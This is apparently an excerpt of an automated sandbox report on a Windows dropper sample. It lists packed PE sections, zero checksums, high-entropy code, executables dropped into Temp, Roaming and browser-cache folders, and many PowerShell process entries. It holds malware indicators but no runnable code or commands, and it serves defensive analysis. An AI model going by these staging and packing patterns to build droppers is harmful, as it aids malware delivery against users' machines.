                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_00446679 push edx; mov dword ptr [esp], ebx5_2_0044668D
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_004387BA push eax; mov dword ptr [esp], ebx5_2_004387D0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_00448802 push ecx; mov dword ptr [esp], ebx5_2_00448816
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_0043E83F push edx; mov dword ptr [esp], ebx5_2_0043E853
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_004408AF push eax; mov dword ptr [esp], ebx5_2_004408C3
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_004409D4 push eax; mov dword ptr [esp], esi5_2_004409E5
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_004389D5 push eax; mov dword ptr [esp], ebx5_2_004389B3
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_00438982 push eax; mov dword ptr [esp], ebx5_2_004389B3
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_00438988 push eax; mov dword ptr [esp], ebx5_2_004389B3
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_00456A60 push eax; mov dword ptr [esp], ebx5_2_00457088
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_00440AF4 push eax; mov dword ptr [esp], esi5_2_00440B05
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_00426AF4 push eax; mov dword ptr [esp], esi5_2_004973BD
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_00460B40 push eax; mov dword ptr [esp], ebx5_2_00460CF6
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_00468DC0 push edx; mov dword ptr [esp], ebx5_2_00469085
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_004014E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,5_2_004014E0
                    Source: Cleaner.exe.22.drStatic PE information: 0xB3912C38 [Fri Jun 19 11:15:04 2065 UTC]
                    Source: T4IoJqcAwY.exeStatic PE information: section name: .sxdata
                    Source: 6282925ea53e7_da60dc03.exe.0.drStatic PE information: section name: .MPRESS1
                    Source: 6282925ea53e7_da60dc03.exe.0.drStatic PE information: section name: .MPRESS2
                    Source: libgcc_s_dw2-1.dll.0.drStatic PE information: section name: /4
                    Source: libstdc++-6.dll.0.drStatic PE information: section name: /4
                    Source: libstdc++-6.dll.0.drStatic PE information: section name: .aspack
                    Source: libstdc++-6.dll.0.drStatic PE information: section name: .adata
                    Source: setup_install.exe.0.drStatic PE information: section name: /4
                    Source: setup_install.exe.0.drStatic PE information: section name: /14
                    Source: setup_install.exe.0.drStatic PE information: section name: /29
                    Source: setup_install.exe.0.drStatic PE information: section name: /41
                    Source: setup_install.exe.0.drStatic PE information: section name: /55
                    Source: setup_install.exe.0.drStatic PE information: section name: /67
                    Source: setup_install.exe.0.drStatic PE information: section name: /80
                    Source: setup_install.exe.0.drStatic PE information: section name: /91
                    Source: setup_install.exe.0.drStatic PE information: section name: /102
                    Source: 6282924fea1c3_82ebfc59.exe.0.drStatic PE information: section name: JM`(q
                    Source: 6282924fea1c3_82ebfc59.exe.0.drStatic PE information: section name:
                    Source: 62829252dc457_91e450cbce.exe.0.drStatic PE information: section name: .didata
                    Source: 62829254ab49d_fc210c4a.exe.0.drStatic PE information: section name: .liwef
                    Source: 62829254ab49d_fc210c4a.exe.0.drStatic PE information: section name: .suvaron
                    Source: 62829254ab49d_fc210c4a.exe.0.drStatic PE information: section name: .disexim
                    Source: 62829254ab49d_fc210c4a.exe.0.drStatic PE information: section name: .dakev
                    Source: 6282925776f05_4ee107b.exe.0.drStatic PE information: section name: .didat
                    Source: 62829258f111c_8df26f0c7d.exe.0.drStatic PE information: section name: .gopakep
                    Source: 62829258f111c_8df26f0c7d.exe.0.drStatic PE information: section name: .mocede
                    Source: 62829258f111c_8df26f0c7d.exe.0.drStatic PE information: section name: .zot
                    Source: 62829258f111c_8df26f0c7d.exe.0.drStatic PE information: section name: .roxa
                    Source: 6282925ab52f1_fdd12e5.exe.0.drStatic PE information: section name: _RDATA
                    Source: 6282925ab52f1_fdd12e5.exe.0.drStatic PE information: section name: .vmp0
                    Source: 6282925ab52f1_fdd12e5.exe.0.drStatic PE information: section name: .vmp1
                    Source: 6282925b8abce_97dd7946.exe.0.drStatic PE information: section name: .piyox
                    Source: 6282925b8abce_97dd7946.exe.0.drStatic PE information: section name: .none
                    Source: 6282925b8abce_97dd7946.exe.0.drStatic PE information: section name: .lurad
                    Source: 6282925b8abce_97dd7946.exe.0.drStatic PE information: section name: .poriga
                    Source: 6282925c504be_44b654a9fe.exe.0.drStatic PE information: section name: .tecokez
                    Source: 6282925c504be_44b654a9fe.exe.0.drStatic PE information: section name: .cox
                    Source: 6282925c504be_44b654a9fe.exe.0.drStatic PE information: section name: .zafilol
                    Source: 6282925c504be_44b654a9fe.exe.0.drStatic PE information: section name: .mejakeb
                    Source: 62829252dc457_91e450cbce.tmp.16.drStatic PE information: section name: .didata
                    Source: 9YDqJhJn.exe.22.drStatic PE information: section name: .MPRESS1
                    Source: 9YDqJhJn.exe.22.drStatic PE information: section name: .MPRESS2
                    Source: D4[1].file.22.drStatic PE information: section name: .MPRESS1
                    Source: D4[1].file.22.drStatic PE information: section name: .MPRESS2
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .MPRESS2
                    Source: T4IoJqcAwY.exeStatic PE information: real checksum: 0x0 should be: 0x8b9a59
                    Source: dll[1].22.drStatic PE information: real checksum: 0x0 should be: 0x400e1
                    Source: 6282925776f05_4ee107b.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x207e4c
                    Source: 62829252dc457_91e450cbce.tmp.16.drStatic PE information: real checksum: 0x0 should be: 0x315890
                    Source: 6282925ab52f1_fdd12e5.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x39063a
                    Source: 62829251169ea_9dc91d.exe.0.drStatic PE information: real checksum: 0x57638 should be: 0x554b9
                    Source: 62829252dc457_91e450cbce.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1cc81c
                    Source: Cleaner.exe.22.drStatic PE information: real checksum: 0x0 should be: 0x20d7f6
                    Source: 6282925d5ee10_0da12a.exe.0.drStatic PE information: real checksum: 0x0 should be: 0xc24ac
                    Source: soft[1].22.drStatic PE information: real checksum: 0x0 should be: 0x20d7f6
                    Source: Bunifu_UI_v1.5.3.dll.22.drStatic PE information: real checksum: 0x0 should be: 0x400e1
                    Source: 6282924fea1c3_82ebfc59.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x52a94
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925776f05_4ee107b.exeFile created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7246453
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.99866963384
                    Source: initial sampleStatic PE information: section name: JM`(q entropy: 7.99893191351
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.18571090919
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.7467101448
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.19421384975
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.65017751606
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.85945428866
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.85945428866
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925776f05_4ee107b.exeFile created: C:\Users\user\AppData\Local\Temp\JFv6.cplJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\D4[1].fileJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\MIXONE[1].fileJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\D3[1].fileJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\dll[1]Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\soft[1]Jump to dropped file
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeFile created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\libstdc++-6.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeFile created: C:\Users\user\AppData\Roaming\9BYudB\9YDqJhJn.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeFile created: C:\Users\user\AppData\Roaming\0Ewjzg90jv\SKG1KLB0.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\MIXONE[1].fileJump to dropped file
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeFile created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeJump to dropped file
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeFile created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\dll[1]Jump to dropped file
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeFile created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925776f05_4ee107b.exeJump to dropped file
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeFile created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeFile created: C:\Users\user\AppData\Local\Temp\is-MLHOA.tmp\62829252dc457_91e450cbce.tmpJump to dropped file
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeFile created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925ea53e7_da60dc03.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeFile created: C:\Users\user\AppData\Local\Temp\YQEfLiaEJum5xoC6Kk\Cleaner.exeJump to dropped file
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeFile created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\libgcc_s_dw2-1.dllJump to dropped file
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeFile created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925c504be_44b654a9fe.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\D3[1].fileJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925776f05_4ee107b.exeFile created: C:\Users\user\AppData\Local\Temp\JFv6.cplJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\D4[1].fileJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\soft[1]Jump to dropped file
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeFile created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829254ab49d_fc210c4a.exeJump to dropped file
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeFile created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925d5ee10_0da12a.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeFile created: C:\Users\user\AppData\Roaming\Mhmb9HRS\qKVHB75j.exeJump to dropped file
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeFile created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeFile created: C:\Users\user\AppData\Local\Temp\YQEfLiaEJum5xoC6Kk\Bunifu_UI_v1.5.3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeFile created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeJump to dropped file
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeFile created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\libwinpthread-1.dllJump to dropped file
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeFile created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925ab52f1_fdd12e5.exeJump to dropped file
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeFile created: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925b8abce_97dd7946.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_00401200 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,14_2_00401200
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_00407DA9 MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect,14_2_00407DA9
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
